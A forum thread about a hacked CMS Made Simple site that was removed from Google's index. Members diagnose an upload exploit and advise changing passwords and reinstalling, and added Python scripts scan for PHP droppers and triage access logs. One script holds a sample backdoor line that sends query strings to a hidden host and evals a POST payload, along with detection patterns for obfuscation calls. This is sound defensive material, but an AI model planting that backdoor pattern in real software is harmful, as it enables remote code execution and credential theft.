Resolved: Removed from Google index/cloaking question

For questions and problems with the CMS core. This board is NOT for any 3rd party modules, addons, PHP scripts or anything NOT distributed with the CMS made simple package itself.
jimbowes
Forum Members
Posts: 20
Joined: Wed Mar 19, 2008 2:54 pm

Resolved: Removed from Google index/cloaking question

Post by jimbowes »

Hi,

I have a CMSMS site that has been working well.

This morning I had a message from Google saying we were being removed from the index due to content that broke their guidelines - which they thought was the site being hacked/cloaking.

The site displays fine to me (http://www.josaka.com) and I was wondering if anyone had any experience/help that could help me see if we have been hacked and what I can do to solve it.

There are search engine specific browser detects in my index.php - are they meant to be there?

Any help appreciated.

Jim

Update:

I found a file in /uploads with this code in:

Code:

xxxxxxxxxxxxxxxxxxxxxxxxxxx
Seems a bit odd?
Last edited by Rolf on Mon Apr 02, 2012 8:14 am, edited 2 times in total.
Reason: removed possible hacked code/links
scooper
Forum Members
Posts: 242
Joined: Fri Dec 09, 2005 12:36 pm

Re: Removed from Google index/cloaking question

Post by scooper »

As I guess you've realised, since the site is currently down 'due to a security issue', you have been hacked.

See http://forum.cmsmadesimple.org/index.php/topic,22516.msg109186.html#msg109186 for a start, and then there's plenty of other information on this forum about tightening up security.
jimbowes
Forum Members
Posts: 20
Joined: Wed Mar 19, 2008 2:54 pm

Re: Removed from Google index/cloaking question

Post by jimbowes »

Yeah I used Google tools and found some weird external links - I think based in the uploads directory and the above file being what was left.

I'm still not entirely sure what the code is doing - I think creating advertising links for some supposed antivirus software - but I'm not sure how this affected users as I can still see the homepage fine (if I want to).

I've taken the site down while I work out what has happened.

Jim
scooper
Forum Members
Posts: 242
Joined: Fri Dec 09, 2005 12:36 pm

Re: Removed from Google index/cloaking question

Post by scooper »

jimbowes wrote: I'm still not entirely sure what the code is doing - I think creating advertising links for some supposed antivirus software - but I'm not sure how this affected users as I can still see the homepage fine (if I want to).
My guess would be stealing passwords.

By the looks of things it's sending query strings back to 'oucha.net' (that's what the base64_decode(b3VjaGEubmV0) line says), and that probably includes your login if you logged in when it was active.

Best choose some new passwords....
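The base64-encoded host in the post above is the usual fingerprint of an obfuscated PHP dropper. As an added example (not code from this thread or from CMS Made Simple), the Python script below does the triage a practitioner would run on a copy of the site: it walks the tree, treats any PHP file under uploads/ as an indicator on its own, flags obfuscation built-ins such as eval/base64_decode/gzinflate, decodes the literals passed to base64_decode so the hidden host becomes readable, and records whether the file reads request data ($_SERVER, $_GET, ...). The sample dropper it writes into a temporary directory is constructed for the demonstration and reuses only the b3VjaGEubmV0 literal quoted in the post; file names and layout are assumptions.

```python
"""Triage helper for a suspected PHP dropper in a CMS upload tree (added example)."""
import base64
import binascii
import os
import re
import tempfile

# PHP built-ins that media uploads never need but droppers lean on.
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|assert|create_function)\s*\(")
# Request data a loader typically forwards to its controller.
REQUEST_DATA = re.compile(r"\$_(SERVER|GET|POST|COOKIE|REQUEST)\b")
# base64_decode('...') with or without quotes (the forum copy lost its quotes).
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=]{4,})['\"]?\s*\)")
PHP_EXT = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")


def decode_b64_literal(literal):
    """Decode one base64 literal, tolerating stripped padding; None if invalid."""
    padded = literal + "=" * (-len(literal) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def decode_base64_literals(src):
    """Return [(literal, decoded)] for every base64_decode('<literal>') in src."""
    out = []
    for m in B64_CALL.finditer(src):
        decoded = decode_b64_literal(m.group(1))
        if decoded is not None:
            out.append((m.group(1), decoded))
    return out


def scan_php_source(src):
    return {
        "calls": sorted(set(SUSPICIOUS_CALLS.findall(src))),
        "decoded": decode_base64_literals(src),
        "reads_request": bool(REQUEST_DATA.search(src)),
    }


def scan_tree(root):
    """Scan every PHP file below root; return findings for anything suspicious."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                result = scan_php_source(fh.read())
            result["path"] = rel
            # PHP under uploads/ is itself an indicator, whatever it contains.
            result["php_in_uploads"] = rel.startswith("uploads/")
            if result["calls"] or result["reads_request"] or result["php_in_uploads"]:
                findings.append(result)
    return findings


# Constructed sample (not real malware): the shape scooper describes, a loader that
# forwards the query string to a base64-hidden host and evals a packed payload.
SAMPLE_DROPPER = """<?php
$h = base64_decode(b3VjaGEubmV0);
@file_get_contents('http://' . $h . '/?' . $_SERVER['QUERY_STRING']);
$p = $_POST['p'];
eval(gzinflate(base64_decode($p)));
"""


def demo():
    """Build a constructed site tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads", "images"))
        with open(os.path.join(root, "uploads", "images", "logo.png"), "wb") as fh:
            fh.write(b"\x89PNG\r\n\x1a\n")  # benign media, skipped by extension
        with open(os.path.join(root, "uploads", "images", "img.php"), "w") as fh:
            fh.write(SAMPLE_DROPPER)  # PHP hiding among images
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php\ninclude 'lib/app.php';\n")  # clean front controller
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f["path"], f["calls"], f["decoded"], "reads request data" if f["reads_request"] else "")
```

Run it against a copy of the site root rather than the live tree, and treat any decoded string that looks like a hostname or URL as an indicator to block at the firewall and search for in the access logs.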
jimbowes
Forum Members
Posts: 20
Joined: Wed Mar 19, 2008 2:54 pm

Re: Removed from Google index/cloaking question

Post by jimbowes »

Does this suggest they only have access to the CMSMS passwords and not the db?

Do you know how they got the file there in the first place, or what the exploit in 1.24 is?

Jim
scooper
Forum Members
Posts: 242
Joined: Fri Dec 09, 2005 12:36 pm

Re: Removed from Google index/cloaking question

Post by scooper »

The 1.2.4 exploit (in the versions I've seen) also added some lines to the config.php so that code was called each time a page was loaded. If that's the case with you then you should definitely assume that the hacker had access to your config and your db password has been compromised.

I have also seen sites where scripts were uploaded to the uploads directory but the config.php file hadn't been amended (because the file permissions were correct) - in those cases it might be that the db password hasn't been accessed... but...

You know what I'm going to say. You should assume the worst and you do need to change your db passwords as well.

I don't know too many details about the exploit but it used a problem in the File Manager which allowed people to upload files to the server. Those files could then be run to do a variety of things including making changes to the config.php file if the permissions had not been reset correctly after an upgrade or an install.
alby

Re: Removed from Google index/cloaking question

Post by alby »

jimbowes wrote: Does this suggest they only have access to the CMSMS passwords and not the db?

Do you know how they got the file there in the first place?/What the exploit in 1.24 is?
No, in the query string there are no login credentials.
But it is much more dangerous, because a script (is it only one?) can always read config.php.
In 1.2.4 there is a problem in a Java applet of the FileManager.

1. Back up your site with a tool that maintains file dates
2. Back up your DB
3. Save your web access/error logs
These operations are for checking the exploit.

Now delete the full tree of your site, upload a new version of CMSMS, touch config.php, restore a previous backup and call /install/index.php without writing tables (in step 3, I think).

Alby
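Steps 1 and 3 of the procedure above (keep file dates, keep the logs) are what let you reconstruct when the file was dropped and who called it. As an added example that is not part of this thread or of CMSMS, the Python script below copies evidence with shutil.copy2 so the mtime survives, and parses Apache combined-format access log lines to find the first request to a PHP script under /uploads/, the IPs that called it, and the /admin/ requests those IPs made beforehand. The log lines, IPs (RFC 5737 documentation ranges) and file paths are constructed for the example; the admin URLs are assumptions, not CMSMS's actual endpoints.

```python
"""Evidence preservation and access-log triage after a web-shell upload (added example)."""
import os
import re
import shutil
import tempfile
from datetime import datetime

PHP_EXT = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")
# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')


def preserve_copy(src, dst):
    """Copy a file keeping its mtime (copy2 calls copystat), so the timestamp
    of a dropped file survives as evidence; returns the copy's mtime."""
    shutil.copy2(src, dst)
    return os.path.getmtime(dst)


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # malformed or non-combined line: skip, do not crash triage
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["target"].split("?", 1)[0]
    return rec


def is_php_under_uploads(path):
    p = path.lower()
    return p.startswith("/uploads/") and p.endswith(PHP_EXT)


def triage(lines):
    """First hit on PHP under /uploads/, the IPs involved, and their earlier admin traffic."""
    recs = [r for r in (parse_line(l) for l in lines) if r]
    hits = [r for r in recs if is_php_under_uploads(r["path"])]
    if not hits:
        return {"first_hit": None, "attacker_ips": [], "backdoor_paths": [],
                "prior_admin_requests": []}
    first = min(hits, key=lambda r: r["ts"])
    ips = sorted({r["ip"] for r in hits})
    prior = [(r["ip"], r["ts"].isoformat(), r["target"]) for r in recs
             if r["ip"] in ips and r["ts"] < first["ts"] and r["path"].startswith("/admin/")]
    return {
        "first_hit": first["ts"].isoformat(),
        "attacker_ips": ips,
        "backdoor_paths": sorted({r["path"] for r in hits}),
        "prior_admin_requests": prior,
    }


# Constructed sample log: one legitimate visitor, one upload-then-execute sequence,
# and a second address polling the dropped script later.
SAMPLE_LOG = """\
198.51.100.7 - - [28/Mar/2012:03:10:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Mar/2012:03:12:40 +0000] "GET /admin/login.php HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
203.0.113.5 - - [28/Mar/2012:03:13:55 +0000] "POST /admin/moduleinterface.php HTTP/1.1" 200 310 "-" "Mozilla/4.0"
203.0.113.5 - - [28/Mar/2012:03:14:07 +0000] "GET /uploads/images/img.php?q=1 HTTP/1.1" 200 87 "-" "Mozilla/4.0"
198.51.100.7 - - [28/Mar/2012:03:15:30 +0000] "GET /uploads/images/logo.png HTTP/1.1" 200 9911 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Mar/2012:04:02:11 +0000] "GET /uploads/images/img.php?q=2 HTTP/1.1" 200 140 "-" "curl/7.21"
""".splitlines()


def demo_preserve():
    """Show that copy2 keeps a backdated mtime while a plain copy loses it."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "img.php")
        with open(src, "w") as fh:
            fh.write("<?php /* constructed sample */\n")
        os.utime(src, (1332904447, 1332904447))  # pretend it was dropped in March 2012
        kept = preserve_copy(src, os.path.join(d, "evidence_copy2.php"))
        shutil.copy(src, os.path.join(d, "evidence_copy.php"))  # plain copy: mtime is now
        lost = os.path.getmtime(os.path.join(d, "evidence_copy.php"))
        return int(os.path.getmtime(src)), int(kept), int(lost)


if __name__ == "__main__":
    print(demo_preserve())
    print(triage(SAMPLE_LOG))
```

Feed it the real access logs for the whole window before the Google notice; the first hit on a PHP file under /uploads/ bounds when the credentials in config.php should be considered exposed, and the earlier /admin/ requests from the same addresses show which admin account or upload path was used.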
jimbowes
Forum Members
Posts: 20
Joined: Wed Mar 19, 2008 2:54 pm

Re: Removed from Google index/cloaking question

Post by jimbowes »

Thanks for the replies. The config.php looks unchanged. I am going to do a fresh install on a new database and then restore the database.

Jim
jimbowes
Forum Members
Posts: 20
Joined: Wed Mar 19, 2008 2:54 pm

Re: Removed from Google index/cloaking question

Post by jimbowes »

Thanks for the help. I have the site on a different server, different host and all new passwords. I don't think there was anything in the db that shouldn't have been. Hopefully that's fixed it.

Jim